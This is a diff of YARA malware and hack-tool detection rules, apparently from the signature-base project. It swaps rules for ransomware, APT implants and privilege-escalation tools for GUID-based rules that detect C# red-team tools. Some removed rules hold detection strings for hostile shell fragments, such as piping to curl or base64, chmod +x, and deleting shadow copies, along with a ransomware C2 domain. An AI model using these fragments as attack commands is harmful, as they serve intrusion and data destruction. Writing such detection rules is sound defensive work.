+		logic_hash = "ff115b2817926a072088d5077d2969028b64ce2306920fa3278cfe842246e747"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "&& chmod +x" ascii
-		$s2 = "|base64 -" ascii
-		$s3 = " /tmp" ascii
-		$s4 = "|curl " ascii
-		$s5 = "whoami" ascii fullword
-		$fp1 = "WITHOUT ANY WARRANTY" ascii
-		$fp2 = "postinst" ascii fullword
-		$fp3 = "THIS SOFTWARE IS PROVIDED" ascii fullword
-		$fp4 = "Free Software Foundation" ascii fullword
+		$typelibguid0lo = "99428732-4979-47b6-a323-0bb7d6d07c95" ascii wide
+		$typelibguid0up = "99428732-4979-47B6-A323-0BB7D6D07C95" ascii wide
+		$typelibguid1lo = "a2c9488f-6067-4b17-8c6f-2d464e65c535" ascii wide
+		$typelibguid1up = "A2C9488F-6067-4B17-8C6F-2D464E65C535" ascii wide
 
 	condition:
-		filesize < 400KB and 3 of ( $s* ) and not 1 of ( $fp* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-
-rule SIGNATURE_BASE_VULN_Printerdriver_Privesc_CVE_2021_3438_Jul21 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpbox : FILE
 {
 	meta:
-		description = "Detects affected drivers with PE timestamps older than the date of the initial report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "34cd648a-3e3f-5832-8abe-18507931eb3d"
-		date = "2021-07-20"
-		modified = "2023-12-05"
-		reference = "https://labs.sentinelone.com/cve-2021-3438-16-years-in-hiding-millions-of-printers-worldwide-vulnerable/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vul_cve_2021_3438_printdriver.yar#L4-L22"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "fda1a67f-d746-5ddb-a33f-97d608b13bc9"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/P1CKLES/SharpBox"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3264-L3278"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b58c2623c8fb84162c1c9390d0398639061ed5b1d4a8e007685e6fabe42bde54"
-		score = 70
+		logic_hash = "dba572c1c52bc887600e5e674403b3a43578ca43c8ea4d6b34530796ef1de0d0"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "7cc9ba2df7b9ea6bb17ee342898edd7f54703b93b6ded6a819e83a7ee9f938b4"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "This String is from Device Driver@@@@@ !!!" ascii
-		$s2 = "\\DosDevices\\ssportc" wide fullword
+		$typelibguid0lo = "616c1afb-2944-42ed-9951-bf435cadb600" ascii wide
+		$typelibguid0up = "616C1AFB-2944-42ED-9951-BF435CADB600" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of ( $s* ) and 1613606400 >= pe.timestamp
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Win_Privesc_Gp3Finder_V4_0 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Rundotnetdll32 : FILE
 {
 	meta:
-		description = "Detects a tool that can be used for privilege escalation - file gp3finder_v4.0.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "3b310c12-ac69-527b-9503-1486ae5f692c"
-		date = "2016-06-02"
-		modified = "2023-12-05"
-		reference = "http://grimhacker.com/2015/04/10/gp3finder-group-policy-preference-password-finder/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_win_privesc.yar#L10-L26"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "266c8add-d2ca-5e46-8594-5d190447d133"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/0xbadjuju/rundotnetdll32"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3280-L3294"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7d5618315ae5293ce1aea18d255d08bb007f39a466021fb636605684433da158"
-		score = 80
-		quality = 60
+		logic_hash = "8d20de93f5e9f0fce189130862153e533a79038d4fdaadb3d4216b6bd294ae05"
+		score = 75
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7d34e214ef2ca33516875fb91a72d5798f89b9ea8964d3990f99863c79530c06"
 
 	strings:
-		$x1 = "Check for and attempt to decrypt passwords on share" ascii
-		$x2 = "Failed to auto get and decrypt passwords. {0}s/" fullword ascii
-		$x3 = "GPPPFinder - Group Policy Preference Password Finder" fullword ascii
+		$typelibguid0lo = "a766db28-94b6-4ed1-aef9-5200bbdd8ca7" ascii wide
+		$typelibguid0up = "A766DB28-94B6-4ED1-AEF9-5200BBDD8CA7" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 1 of ( $x* ) ) or ( all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Win_Privesc_Folderperm
+rule SIGNATURE_BASE_HKTL_NET_GUID_Antidebug : FILE
 {
 	meta:
-		description = "Detects a tool that can be used for privilege escalation - file folderperm.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "131fdb57-f9ca-5247-8bb4-c939eff5b8bf"
-		date = "2016-06-02"
-		modified = "2023-12-05"
-		reference = "http://www.greyhathacker.net/?p=738"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_win_privesc.yar#L28-L44"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "f381081b-d0cb-593d-ad3d-28816f770b67"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/malcomvetter/AntiDebug"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3296-L3310"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "899fda75e4c6d9f588767e5170dbd30241a492ba89f7cc1b0ad4adb2fcd173cb"
-		score = 80
+		logic_hash = "32ae8a5221f3b1c913163590291461fe7868f25be02c3b0b045a4934d97d244a"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1aa87df34826b1081c40bb4b702750587b32d717ea6df3c29715eb7fc04db755"
 
 	strings:
-		$x1 = "# powershell.exe -executionpolicy bypass -file folderperm.ps1" fullword ascii
-		$x2 = "Write-Host \"[i] Dummy test file used to test access was not outputted:\" $filetocopy" fullword ascii
-		$x3 = "Write-Host -foregroundColor Red \"      Access denied :\" $myarray[$i] " fullword ascii
+		$typelibguid0lo = "997265c1-1342-4d44-aded-67964a32f859" ascii wide
+		$typelibguid0up = "997265C1-1342-4D44-ADED-67964A32F859" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Win_Privesc_Adaclscan4_3
+rule SIGNATURE_BASE_HKTL_NET_GUID_Dinvisibleregistry : FILE
 {
 	meta:
-		description = "Detects a tool that can be used for privilege escalation - file ADACLScan4.3.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "15867a9c-9b9b-5d29-bf51-2b3e91af556f"
-		date = "2016-06-02"
-		modified = "2023-12-05"
-		reference = "https://adaclscan.codeplex.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_win_privesc.yar#L46-L62"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "98409bbe-6346-5825-b7f7-c1afeac2b038"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/NVISO-BE/DInvisibleRegistry"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3312-L3326"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ca657e5c4172d240f46a890fc112ee89d5bdf9e35e7d412332ee11bdaf166215"
-		score = 60
+		logic_hash = "a14dca802a63983d1c3974a4c195fd7bd5f256ace03d4bcea2d88eef6958931b"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3473ddb452de7640fab03cad3e8aaf6a527bdd6a7a311909cfef9de0b4b78333"
 
 	strings:
-		$s1 = "<Label x:Name=\"lblPort\" Content=\"Port:\"  HorizontalAlignment=\"Left\" Height=\"28\" Margin=\"10,0,0,0\" Width=\"35\"/>" fullword ascii
-		$s2 = "(([System.IconExtractor]::Extract(\"mmcndmgr.dll\", 126, $true)).ToBitMap()).Save($env:temp + \"\\Other.png\")    " fullword ascii
-		$s3 = "$bolValid = $ctx.ValidateCredentials($psCred.UserName,$psCred.GetNetworkCredential().Password)" fullword ascii
+		$typelibguid0lo = "31d576fb-9fb9-455e-ab02-c78981634c65" ascii wide
+		$typelibguid0up = "31D576FB-9FB9-455E-AB02-C78981634C65" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_MAL_Ransomware_Germanwiper : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Tikitorch : FILE
 {
 	meta:
-		description = "Detects RansomWare GermanWiper in Memory or in unpacked state"
-		author = "Frank Boldewin (@r3c0nst), modified by Florian Roth"
-		id = "e7587691-f69a-53e7-bab2-875179fbfa19"
-		date = "2019-08-05"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/r3c0nst/status/1158326526766657538"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_ransom_germanwiper.yar#L1-L27"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "354ee690-a0d0-5cc5-a73b-53b916ed0169"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/rasta-mouse/TikiTorch"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3328-L3354"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "dcb4f91006a893149a60e9708efb9de809f75c810bddfd2d90c8f6fffa0879ea"
+		logic_hash = "072129fea5e40b2fcbf13156ccf8c5a05e343b98f02dc7140261f6534a5b9e4e"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash_packed = "41364427dee49bf544dcff61a6899b3b7e59852435e4107931e294079a42de7c"
-		hash_unpacked = "708967cad421bb2396017bdd10a42e6799da27e29264f4b5fb095c0e3503e447"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x_Mutex1 = "HSDFSD-HFSD-3241-91E7-ASDGSDGHH" ascii
-		$x_Mutex2 = "cFgxTERNWEVhM2V" ascii
-		$PurgeCode = { 6a 00 8b 47 08 50 6a 00 6a 01 e8 ?? ?? ?? ??
-                     50 e8 ?? ?? ?? ?? 8b f0 8b d7 8b c3 e8 }
-		$ProcessKill1 = "sqbcoreservice.exe" ascii
-		$ProcessKill2 = "isqlplussvc.exe" ascii
-		$KillShadowCopies = "vssadmin.exe delete shadows" ascii
-		$Domain1 = "cdnjs.cloudflare.com" ascii
-		$Domain2 = "expandingdelegation.top" ascii
-		$RansomNote = "Entschluesselungs_Anleitung.html" ascii
+		$typelibguid0lo = "806c6c72-4adc-43d9-b028-6872fa48d334" ascii wide
+		$typelibguid0up = "806C6C72-4ADC-43D9-B028-6872FA48D334" ascii wide
+		$typelibguid1lo = "2ef9d8f7-6b77-4b75-822b-6a53a922c30f" ascii wide
+		$typelibguid1up = "2EF9D8F7-6B77-4B75-822B-6A53A922C30F" ascii wide
+		$typelibguid2lo = "8f5f3a95-f05c-4dce-8bc3-d0a0d4153db6" ascii wide
+		$typelibguid2up = "8F5F3A95-F05C-4DCE-8BC3-D0A0D4153DB6" ascii wide
+		$typelibguid3lo = "1f707405-9708-4a34-a809-2c62b84d4f0a" ascii wide
+		$typelibguid3up = "1F707405-9708-4A34-A809-2C62B84D4F0A" ascii wide
+		$typelibguid4lo = "97421325-b6d8-49e5-adf0-e2126abc17ee" ascii wide
+		$typelibguid4up = "97421325-B6D8-49E5-ADF0-E2126ABC17EE" ascii wide
+		$typelibguid5lo = "06c247da-e2e1-47f3-bc3c-da0838a6df1f" ascii wide
+		$typelibguid5up = "06C247DA-E2E1-47F3-BC3C-DA0838A6DF1F" ascii wide
+		$typelibguid6lo = "fc700ac6-5182-421f-8853-0ad18cdbeb39" ascii wide
+		$typelibguid6up = "FC700AC6-5182-421F-8853-0AD18CDBEB39" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 1000KB and ( 1 of ( $x* ) or 3 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_Venom_LIB_Dec22 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Hivejack : FILE
 {
 	meta:
-		description = "Detects Venom - a library that meant to perform evasive communication using stolen browser socket"
-		author = "Ido Veltzman, Florian Roth"
-		id = "b13b8a9c-52a4-53ac-817e-9f729fbf17c2"
-		date = "2022-12-17"
-		modified = "2023-12-05"
-		reference = "https://github.com/Idov31/Venom"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_hktl_venom_lib.yar#L2-L30"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "10567ef4-780f-5e93-9061-3214116d6bbb"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/Viralmaniar/HiveJack"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3356-L3370"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fa143946479a45b272d507c3aa2b17026bfdcbb4abefd833f95ff78537568ec1"
+		logic_hash = "22ca377cc1f1d634564084e92e976e21df0cf8bf864cb772a49f740a6a429a4e"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "[ + ] Created detached hidden msedge process: " fullword ascii
-		$ss1 = "WS2_32.dll" fullword ascii
-		$ss2 = "WSASocketW" fullword ascii
-		$ss3 = "WSADuplicateSocketW" fullword ascii
-		$ss5 = "\\Device\\Afd" wide fullword
-		$sx1 = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe --no-startup-window" fullword wide
-		$sx2 = "[ + ] Data sent!" fullword ascii
-		$sx3 = "[ + ] Socket obtained!" fullword ascii
-		$op1 = { 4c 8b f0 48 3b c1 48 b8 ff ff ff ff ff ff ff 7f }
-		$op2 = { 48 8b cf e8 1c 34 00 00 48 8b 5c 24 30 48 8b c7 }
-		$op3 = { 48 8b da 48 8b f9 45 33 f6 48 85 c9 0f 84 34 01 }
+		$typelibguid0lo = "e12e62fe-bea3-4989-bf04-6f76028623e3" ascii wide
+		$typelibguid0up = "E12E62FE-BEA3-4989-BF04-6F76028623E3" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( ( 3 of ( $ss* ) and all of ( $op* ) ) or 2 of ( $sx* ) ) or $x1 or all of ( $sx* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-
-rule SIGNATURE_BASE_APT_Darkhydrus_Jul18_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Decryptautologon : FILE
 {
 	meta:
-		description = "Detects strings found in malware samples in APT report in DarkHydrus"
-		author = "Florian Roth (Nextron Systems)"
-		id = "fbd001c0-43c9-5429-84d6-7f62eadd8ff3"
-		date = "2018-07-28"
-		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_darkhydrus.yar#L13-L29"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "3ef58da9-16c1-54cf-9d06-a05680548cf5"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/securesean/DecryptAutoLogon"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3372-L3386"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2c39f2e6b37e6422984275f45a2917891c3b482d137dbbfd6293088c2f2dacc3"
+		logic_hash = "2d8d05f568528616da30f0f35c3baf7ba762e33319a7d7975ddb23e42944884f"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "99541ab28fc3328e25723607df4b0d9ea0a1af31b58e2da07eff9f15c4e6565c"
 
 	strings:
-		$x1 = "Z:\\devcenter\\aggressor\\" ascii
+		$typelibguid0lo = "015a37fc-53d0-499b-bffe-ab88c5086040" ascii wide
+		$typelibguid0up = "015A37FC-53D0-499B-BFFE-AB88C5086040" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "d3666d1cde4790b22b44ec35976687fb" or 1 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_Darkhydrus_Jul18_2 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Unstoppableservice : FILE
 {
 	meta:
-		description = "Detects strings found in malware samples in APT report in DarkHydrus"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1a21cbbf-f7e1-56eb-973b-35c1a811e210"
-		date = "2018-07-28"
-		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_darkhydrus.yar#L31-L48"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "8c65fbee-d779-57a8-851b-7583be66c67a"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/malcomvetter/UnstoppableService"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3388-L3402"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e967fec69ad1cbb46a63ee520594e7d6f2445a400510a9864dbd6d4c6e092737"
+		logic_hash = "1b2039d27bfaa624b47886e7a310e6b2ec0f6063e973e449270dfca54a7bdd7b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b2571e3b4afbce56da8faa726b726eb465f2e5e5ed74cf3b172b5dd80460ad81"
 
 	strings:
-		$s4 = "windir" fullword ascii
-		$s6 = "temp.dll" fullword ascii
-		$s7 = "libgcj-12.dll" fullword ascii
-		$s8 = "%s\\System32\\%s" fullword ascii
-		$s9 = "StartW" fullword ascii
+		$typelibguid0lo = "0c117ee5-2a21-dead-beef-8cc7f0caaa86" ascii wide
+		$typelibguid0up = "0C117EE5-2A21-DEAD-BEEF-8CC7F0CAAA86" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 40KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-
-rule SIGNATURE_BASE_APT_Darkhydrus_Jul18_3 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpwmi_2 : FILE
 {
 	meta:
-		description = "Detects strings found in malware samples in APT report in DarkHydrus"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1f766b49-3173-5f8a-ba52-a9ce9000be79"
-		date = "2018-07-28"
-		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_darkhydrus.yar#L50-L67"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "e6ab2f5e-2a5a-5be9-9b66-96cb745fd199"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		old_rule_name = "HKTL_NET_GUID_SharpWMI"
+		reference = "https://github.com/GhostPack/SharpWMI"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3404-L3419"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0f3425322846e6064ec2576ad4e73061fbec3e4400de54d05fe07b8ad2a31f92"
+		logic_hash = "2541e7eeb07ee9d018067c35765c9ad68c9c8ecf0baa723e410dde8c55dabbd0"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c8b3d4b6acce6b6655e17255ef7a214651b7fc4e43f9964df24556343393a1a3"
 
 	strings:
-		$s2 = "Ws2_32.dll" fullword ascii
-		$s3 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)" fullword ascii
+		$typelibguid0lo = "6dd22880-dac5-4b4d-9c91-8c35cc7b8180" ascii wide
+		$typelibguid0up = "6DD22880-DAC5-4B4D-9C91-8C35CC7B8180" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( pe.imphash ( ) == "478eacfbe2b201dabe63be53f34148a5" or all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-
-rule SIGNATURE_BASE_HKTL_Unlicensed_Cobaltstrike_EICAR_Jul18_5 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Ewstoolkit : FILE
 {
 	meta:
-		description = "Detects strings found in CobaltStrike shellcode"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d52536b8-dd6b-59be-8761-d22b6a279114"
-		date = "2018-07-28"
-		modified = "2021-06-17"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_darkhydrus.yar#L69-L90"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "acde7744-d17f-5e47-a5e2-ff4f4c4d8093"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/rasta-mouse/EWSToolkit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3421-L3435"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d066f22e01f9ca3a33c669552046a5ab8dd9e579236974b1c468ba9644498951"
+		logic_hash = "bc7f82779efec8a5e2a6a861a8e7a50e71e0b1e8891618f56bd12e0ce09eefc3"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "cec36e8ed65ac6f250c05b4a17c09f58bb80c19b73169aaf40fa15c8d3a9a6a1"
 
 	strings:
-		$x1 = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
-		$s1 = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" fullword ascii
-		$s2 = "libgcj-12.dll" fullword ascii
+		$typelibguid0lo = "ca536d67-53c9-43b5-8bc8-9a05fdc567ed" ascii wide
+		$typelibguid0up = "CA536D67-53C9-43B5-8BC8-9A05FDC567ED" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 900KB and ( pe.imphash ( ) == "829da329ce140d873b4a8bde2cbfaa7e" or all of ( $s* ) or $x1 )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_1_V1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sweetpotato : FILE
 {
 	meta:
-		description = "Downrage Implant by APT28"
-		author = "US CERT"
-		id = "eb3fc39b-08ca-51df-a9b4-7b28b107b700"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L12-L26"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "0e347d94-51eb-5589-93d8-b19fec7f2365"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/CCob/SweetPotato"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3437-L3453"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4df04daf70da482877874c530a3ad76fddebec2946931b60f98aa6c4e31f21ae"
-		score = 85
+		logic_hash = "0a514be8ef3b51a3cad22a470afd9a4911c7156bfbf14f0a33522b429041e5bb"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$STR1 = {6A ?? E8 ?? ?? FF FF 59 85 C0 74 0B 8B C8 E8 ?? ?? FF FF 8B F0
-         EB 02 33 F6 8B CE E8 ?? ?? FF FF 85 F6 74 0E 8B CE E8 ?? ?? FF FF 56
-         E8 ?? ?? FF FF 59}
+		$typelibguid0lo = "6aeb5004-6093-4c23-aeae-911d64cacc58" ascii wide
+		$typelibguid0up = "6AEB5004-6093-4C23-AEAE-911D64CACC58" ascii wide
+		$typelibguid1lo = "1bf9c10f-6f89-4520-9d2e-aaf17d17ba5e" ascii wide
+		$typelibguid1up = "1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
